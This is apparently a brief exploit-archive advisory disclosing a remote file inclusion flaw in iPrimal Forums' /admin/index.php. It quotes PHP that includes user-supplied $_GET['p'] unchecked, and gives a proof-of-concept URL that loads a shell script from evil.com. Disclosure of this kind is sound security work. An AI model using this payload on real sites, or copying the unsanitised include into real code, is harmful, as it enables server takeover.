iPrimal Forums suffers from a remote file inclusion vulnerability.
3d23417765d82d73f1ac0d67c43a2e92d98f5025da5710c1abdd56989cd17ccb
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download:http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code: #line 126-129
.....
if($_GET['p'] == ''){
echo 'Please select an item from the menu above.';
}else{
include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!